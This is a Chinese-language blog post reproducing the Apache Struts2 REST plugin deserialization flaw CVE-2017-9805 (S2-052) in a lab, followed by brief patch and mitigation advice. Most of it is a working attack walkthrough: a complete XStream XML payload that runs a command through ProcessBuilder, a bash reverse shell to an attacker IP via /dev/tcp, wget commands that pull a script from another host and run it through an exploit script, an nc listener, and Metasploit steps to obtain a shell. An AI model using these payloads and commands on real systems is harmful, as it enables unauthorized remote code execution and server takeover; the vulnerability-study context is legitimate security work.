struts2(s2-052)远程命令执行漏洞复现

时间:2024-01-29 20:27:28

 

漏洞描述:

2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击

漏洞编号:

CVE编号:CVE-2017-9805

漏洞复现:

利用弹出计算器复现:

漏洞环境为:win2008sr2+tomcat9.0

1.从struts2的官网下载最后受影响的版本struts-2.5.12,其下载地址: 
http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip  

 

 
拿到struts-2.5.12-apps之后,将其中的app目录下的struts2-rest-showcase.war文件放到webapps目录下,我的是

D:\apache-tomcat-9.0.0.M26\webapps

2.浏览器中访问地址:http://ip地址:8080/struts2-rest-showcase/

会跳转,然后出现下面的页面:

 

3.点击一个edit进行编译页面,然后提交,并用burp抓包。

 

 

并发送到repeater进行修改包如下:

这里将:

Content-Type: application/x-www-form-urlencoded 修改为:

Content-Type: application/xml

post数据改成:

下面的command就是反序列化出来的命令执行:

<map>

<entry>

<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc.exe</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>

</map>

 

4.修改完后,就进行提交包:

 

可以看到响应页面中有500错误:

 

 

5.最终在目标机器弹出了计算器

 

 

利用s2-052.py反弹linux下的struts2:

1.环境搭建:

目标靶机:ubuntu16.04x64+docker(ip地址:192.168.1.105)

攻击机:kali(nc运行监听,IP地址:192.168.1.113)

2.dokce镜像地址:

https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-037

3.在ubuntu上执行:

docker pull medicean/vulapps:s_struts2_s2-037  #拉取镜像到本地

docker run -d -p 8080:8080 medicean/vulapps:s_struts2_s2-037 #启动环境

最终访问:

http://192.168.1.105:8080/orders

 

 

4.编写bk.sh脚本,内容为:

bash -i >& /dev/tcp/192.168.1.113/666 0>&1  #这里的ip就是我NC监听的IP地址

6.将bk.sh放到hsf搭建的ftp服务器上或者其他提供文件服务器上

7.通过运行python s2-052.py执行如下:

python  s2-052.py  http://192.168.1.105:8080/orders  "wget http://192.168.1.102/bk.sh"   #下载到目标靶机上

 

 

python  s2-052.py  http://192.168.1.105:8080/orders  "/bin/bash ./bk.sh"  #执行sh脚本

 

 

9.然后在kali进行nc监听,并反弹出shell:

nc  -lvvp  666

 

 

s2-052.py的下载地址:

https://raw.githubusercontent.com/backlion/demo/master/s2-052%20.py

 

msf下的反弹struts2的shell:

测试环境:

目标靶机:ubuntu16.04x64+docker(采用如上文说的利用s2-052.py反弹linux下的struts2搭建环境)

攻击机:kali2017(貌似在kali2016上有点问题,加载不了payload)

1.在kali上执行:

root@kali2017:~# cd /opt

root@kali2017:/opt# wget https://raw.githubusercontent.com/wvu-r7/metasploit-framework/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/strut

root@kali2017:/opt# cp struts2_rest_xstream.rb /usr/share/metasploit-framework/modules/exploits/multi/http/

 

root@kali2017:/opt# msfconsole

msf > use exploit/multi/http/struts2_rest_xstream

msf exploit(struts2_rest_xstream) > show options

msf exploit(struts2_rest_xstream) > set rhost  192.168.1.105

msf exploit(struts2_rest_xstream) > set rport 8080

msf exploit(struts2_rest_xstream) > set target /orders

msf exploit(struts2_rest_xstream) > set lhost  192.168.1.113

msf exploit(struts2_rest_xstream) > set lport 443

msf exploit(struts2_rest_xstream) > exploit

 

 

可以看到成功反弹shell

 

受影响版本:

Apache Struts Version:Struts 2.5 - Struts 2.5.12

漏洞修复建议:

1、升级到Apache Struts版本2.5.13

2、最好的选择是在不使用时删除Struts REST插件,或仅限于服务器普通页面和JSONs:

<constant name="struts.action.extension" value="xhtml,,json" />

3、限制服务端扩展类型,删除XML支持。

由于应用的可用类的默认限制,某些REST操作可能会停止工作。在这种情况下,请调查介绍的新接口以允许每个操作定义类限制,那些接口是:

org.apache.struts2.rest.handler.AllowedClasses

org.apache.struts2.rest.handler.AllowedClassNames

org.apache.struts2.rest.handler.XStreamPermissionProvider